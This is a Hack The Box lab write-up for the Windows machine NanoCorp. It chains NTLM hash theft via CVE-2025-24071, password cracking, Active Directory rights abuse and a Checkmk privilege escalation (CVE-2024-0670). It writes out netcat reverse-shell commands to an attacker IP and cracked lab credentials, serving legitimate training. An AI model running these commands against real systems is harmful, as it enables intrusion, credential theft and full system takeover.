Hack The Box / WINDOWS / 2026-06-20
Hack The Box — NanoCorp (Windows)
A File Explorer vulnerability (CVE-2025-24071) allows to steal the credentials of a user. That user can change the password of another user which has shell access on the machine. Finally we can exploit a vulnerability in Checkmk (CVE-2024-0670) to get a reverse shell as nt authority/system.
Target:
- IP:
10.10.11.93
Port scan
sudo nmap -sC -sV 10.10.11.93 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-12 03:46:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.nanocorp.htb
| Issuer: commonName=DC01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-20T01:58:09
| Not valid after: 2026-04-21T01:58:09
| MD5: 4f00:467e:e490:4141:7c94:19b7:4ab3:76e6
|_SHA-1: 0b96:8038:2148:abee:9372:2809:14f1:b62a:a539:320b
|_ssl-date: 2025-11-12T03:48:07+00:00; +9h14m39s from scanner time.
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Issuer: commonName=dc01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-06T22:58:43
| Not valid after: 2026-04-06T23:18:43
| MD5: 2e3e:1a10:10b8:7f43:dc93:a4d9:05ef:6053
|_SHA-1: 4674:6312:27ce:e783:91b7:ec00:1746:f114:d669:4ea0
|_http-server-header: Microsoft-HTTPAPI/2.0
6556/tcp open check_mk check_mk extension for Nagios 2.1.0p10
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
54100/tcp open msrpc Microsoft Windows RPC
54119/tcp open msrpc Microsoft Windows RPC
58937/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add dc01.nanocorp.htb and nanocorp.htb to /etc/hosts.
Initial enumeration
With a browser, go to http://nanocorp.htb/. It's a PHP website served through Apache on Windows. If you click on about us there is a link to hire.nanocorp.htb. Add hire.nanocorp.htb to /etc/hosts and go to http://hire.nanocorp.htb/. It is also a PHP website.
We can upload a file. The website says that only .zip files are allowed. If we upload an invalid .zip file, we get: Invalid file type. Only ZIP, 7Z, and RAR files are allowed. So we can also upload 7z and RAR files.
File Explorer vulnerability - CVE-2025-24071
There is a vulnerability of Windows File Explorer: CVE-2025-24071.
Here there is a POC: https://github.com/0x6rss/CVE-2025-24071_PoC. Let's replicate it.
Firstly, run responder:
sudo responder -I tun0
Then, run the POC:
git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
cd CVE-2025-24071_PoC
python3 poc.py
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.16.119
completed
A file exploit.zip is created. Upload it to the website. Wait. On the terminal with responder, we get:
[SMB] NTLMv2-SSP Client : 10.10.11.93
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:9af330c92ab237aa:3FAAAC9EDEC73414E3E3214BFD8E7801:01010000000000000006EA90E579DC01E0E0F7029844F9A60000000002000800540053004D00540001001E00570049004E002D00510031005A003800570036005A00350049003800550004003400570049004E002D00510031005A003800570036005A0035004900380055002E00540053004D0054002E004C004F00430041004C0003001400540053004D0054002E004C004F00430041004C0005001400540053004D0054002E004C004F00430041004C00070008000006EA90E579DC01060004000200000008003000300000000000000000000000002000007542898D7474CAA3E415CB668DEE73B843AA1DC825CD37369E89E55B727127910A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100310039000000000000000000
Cracking the password of the user web_svc
Put the hash in a file hash. Crack the hash with hashcat:
hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt
We get:
WEB_SVC::NANOCORP:9af330c92ab237aa:3faaac9edec73414e3e3214bfd8e7801:01010000000000000006ea90e579dc01e0e0f7029844f9a60000000002000800540053004d00540001001e00570049004e002d00510031005a003800570036005a00350049003800550004003400570049004e002d00510031005a003800570036005a0035004900380055002e00540053004d0054002e004c004f00430041004c0003001400540053004d0054002e004c004f00430041004c0005001400540053004d0054002e004c004f00430041004c00070008000006ea90e579dc01060004000200000008003000300000000000000000000000002000007542898d7474caa3e415cb668dee73b843aa1dc825cd37369e89e55b727127910a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310036002e003100310039000000000000000000:dksehdgh712!@#
We got credentials: web_svc / dksehdgh712!@#
Let's use them for SMB enumeration:
nxc smb dc01.nanocorp.htb -u web_svc -p 'dksehdgh712!@#' --shares
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
SMB 10.10.11.93 445 DC01 [*] Enumerated shares
SMB 10.10.11.93 445 DC01 Share Permissions Remark
SMB 10.10.11.93 445 DC01 ----- ----------- ------
SMB 10.10.11.93 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.93 445 DC01 C$ Default share
SMB 10.10.11.93 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.93 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.93 445 DC01 SYSVOL READ Logon server share
BloodHound enumeration
We can enumerate the domain with bloodhound:
bloodhound-ce-python -u web_svc -p 'dksehdgh712!@#' -ns 10.10.11.93 -d 'nanocorp.htb' -dc dc01.nanocorp.htb -c All --zip
We get a .zip file
Run bloodhound. On Kali Linux:
sudo bloodhound
Upload the .zip on bloodhound.
From bloodhound we see that web_svc hash an AddSelf relationship on the it_support group. So we can add our user to this group.
Download bloodyad: https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host dc01.nanocorp.htb -d nanocorp.htb --dc-ip 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' add groupMember it_support web_svc
[+] web_svc added to it_support
Changing the password of the user monitoring_svc
From bloodhound we see that the it_support group has a ForceChangePassword relationship on the monitoring_svc user. So we can change the password of this user.
python3 bloodyAD/bloodyAD.py --host dc01.nanocorp.htb -d nanocorp.htb --dc-ip 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' set password monitoring_svc 'Summer2025!'
[+] Password changed successfully!
Now, let's enumerate the SMB shares with the new user:
nxc smb dc01.nanocorp.htb -u monitoring_svc -p 'Summer2025!' --shares
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [-] nanocorp.htb\monitoring_svc:Summer2025! STATUS_ACCOUNT_RESTRICTION
Here the error is explained: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/639c2244-b6d5-4ca3-8ca0-74fe787cbae6. Apparently, this error happens when we use the NTLM authentication. Let's switch to Kerberos authentication. Grab a TGT for the user monitoring_svc:
getTGT.py nanocorp.htb/monitoring_svc:'Summer2025!' -dc-ip 10.10.11.93
[*] Saving ticket in monitoring_svc.ccache
export KRB5CCNAME=monitoring_svc.ccache
nxc smb dc01.nanocorp.htb -d nanocorp.htb -k --use-kcache --shares
SMB dc01.nanocorp.htb 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB dc01.nanocorp.htb 445 DC01 [+] nanocorp.htb\monitoring_svc from ccache
SMB dc01.nanocorp.htb 445 DC01 [*] Enumerated shares
SMB dc01.nanocorp.htb 445 DC01 Share Permissions Remark
SMB dc01.nanocorp.htb 445 DC01 ----- ----------- ------
SMB dc01.nanocorp.htb 445 DC01 ADMIN$ Remote Admin
SMB dc01.nanocorp.htb 445 DC01 C$ Default share
SMB dc01.nanocorp.htb 445 DC01 IPC$ READ Remote IPC
SMB dc01.nanocorp.htb 445 DC01 NETLOGON READ Logon server share
SMB dc01.nanocorp.htb 445 DC01 SYSVOL READ Logon server share
Now it works. From bloodhound we see that the monitoring_svc user is member of the Remote Management Users group. So we can use evil-winrm to get a shell on the machine.
Firstly, modify the file /etc/krb5.conf and add these lines:
[realms]
NANOCORP.HTB = {
kdc = dc01.nanocorp.htb
admin_server = dc01.nanocorp.htb
}
[domain_realm]
.nanocorp.htb = NANOCORP.HTB
nanocorp.htb = NANOCORP.HTB
Then, run evil-winrm:
evil-winrm -i dc01.nanocorp.htb -u monitoring_svc -r nanocorp.htb -P 5986 -S
We get a powershell shell. However, this shell is not so stable. Let's get a more stable reverse shell.
Download nc64.exe (https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe) and upload it to the victim machine (for example, using a python http server and curl).
On the attacking machine, run a netcat listener:
rlwrap nc -vlnp 4444
On the victim machine, run:
C:\tmp\nc64.exe -e cmd.exe 10.10.16.119 4444
We get a reverse shell. Type powershell to get a powershell shell.
Checkmk - CVE-2024-0670
In the C:\ProgramData folder, we notice the checkmk folder. It is the Checkmk program.
In ProgramData we also find a file cmk_agent_uninstall.txt, which contains:
Checkmk monitoring agent service - 2.1, 64-bit
We have the version, thus we can search on internet for known vulnerabilities. We find one: CVE-2024-0670.
It is described here: https://checkmk.com/werk/16361.
Here there is a POC: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/.
We can create files in C:\Windows\Temp with a name that follows a precise pattern (cmk_all_\d+_1.cmd), and the program will run the commands in that file as the user nt authority/system.
icacls C:\Windows\Temp
C:\Windows\Temp: Access is denied.
Successfully processed 0 files; Failed processing 1 files
Apparently, the monitoring_svc user does not have permission to write in C:\Windows\Temp. Let's try to get a reverse shell as web_svc.
Download RunasCs.exe (https://github.com/antonioCoco/RunasCs) and upload it to the victim machine. Then, on the victim machine, run:
.\RunasCs.exe web_svc 'dksehdgh712!@#' "whoami"
nanocorp\web_svc
We can run commands as web_svc. Let's get the reverse shell.
On the attacking machine, run a netcat listener:
rlwrap nc -vlnp 4444
On the victim machine, run:
.\RunasCs.exe web_svc 'dksehdgh712!@#' "C:\tmp\nc64.exe -e cmd.exe 10.10.16.119 4444"
We get a reverse shell as web_svc. Type powershell to get a powershell shell.
icacls C:\Windows\Temp
C:\Windows\Temp BUILTIN\Users:(CI)(S,WD,AD,X)
BUILTIN\Administrators:(F)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
CREATOR OWNER:(OI)(CI)(IO)(F)
NANOCORP\web_svc:(OI)(CI)(F)
Now we can write in C:\Windows\Temp.
Now, we don't know the number in the name of the file for the exploit, and it can change. To find the range of possible numbers, let's monitor the files cmk_all_*_1.cmd that the program creates in C:\Windows\Temp.
See the attached script monitor.ps1. Upload it on the victim machine.
.\monitor.ps1
Monitoring C:\Windows\Temp for cmk_all_*_*.cmd
To trigger the creation of the file cmk_all, following the POC, we can trigger the fixing of the software.
We have to find the .msi file of checkmk in the folder C:\Windows\Installer. There are several ways:
- Reading specific keys of the registry
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | fl
We notice that checkmk has the following local package: C:\Windows\Installer\1e6f2.msi
- Checking the .msi files of the folder
C:\Windows\Installer. See the attached scriptcheck_msi.ps1. Upload it on the victim machine.
.\check_msi.ps1
MSIFile ProductName
------- -----------
1e6f2.msi Check MK Agent 2.1
387c2.msi Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532
387c6.msi Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532
387ca.msi Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532
387ce.msi Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532
387d1.msi VMware Tools
We notice that the .msi file of checkmk is 1e6f2.msi.
Now, on another shell as web_svc, following the POC, we trigger the creation of the file cmk_all with the command:
msiexec /fa C:\Windows\Installer\1e6f2.msi /qn
On the terminal with monitor.ps1, we get:
[2025-12-31 16:36:25] Checkmk temp file created: C:\Windows\Temp\cmk_all_7580_1.cmd
We can reasonably assume that the correct range of numbers is between 1000 and 10000.
But, instead of brute forcing the number, since we can monitor when the file cmk_all is created in C:\Windows\Temp, as soon as we detect it, we can overwrite its content with arbitrary commands that we want to run. The idea is to get a reverse shell as nt authority/system.
Copy nc64.exe to C:\Windows\Temp. Then, on the attacking machine, run a netcat listener:
rlwrap nc -vlnp 4444
See the attached script monitor_and_replace.ps1. Upload the script on the victim machine and run it:
.\monitor_and_replace.ps1
On the other shell as web_svc, trigger the creation of the file cmk_all with the command:
msiexec /fa C:\Windows\Installer\1e6f2.msi /qn
On the terminal with monitor_and_replace.ps1, we get:
[2026-01-01 15:43:05] Checkmk temp file created: C:\Windows\Temp\cmk_all_2436_1.cmd
Replaced content with payload
On the terminal with the netcat listener, we get a reverse shell as nt authority/system. Type powershell to get a powershell shell.
whoami
nt authority\system
Useful Notes
Check the number of files in a folder:
$filesCount = (Get-ChildItem "C:\Windows\Temp" -File).Count; $filesCount
Check the 10 most recently accessed files in a folder:
Get-ChildItem C:\Windows\Temp | Sort-Object LastAccessTime -Descending | Select-Object -First 10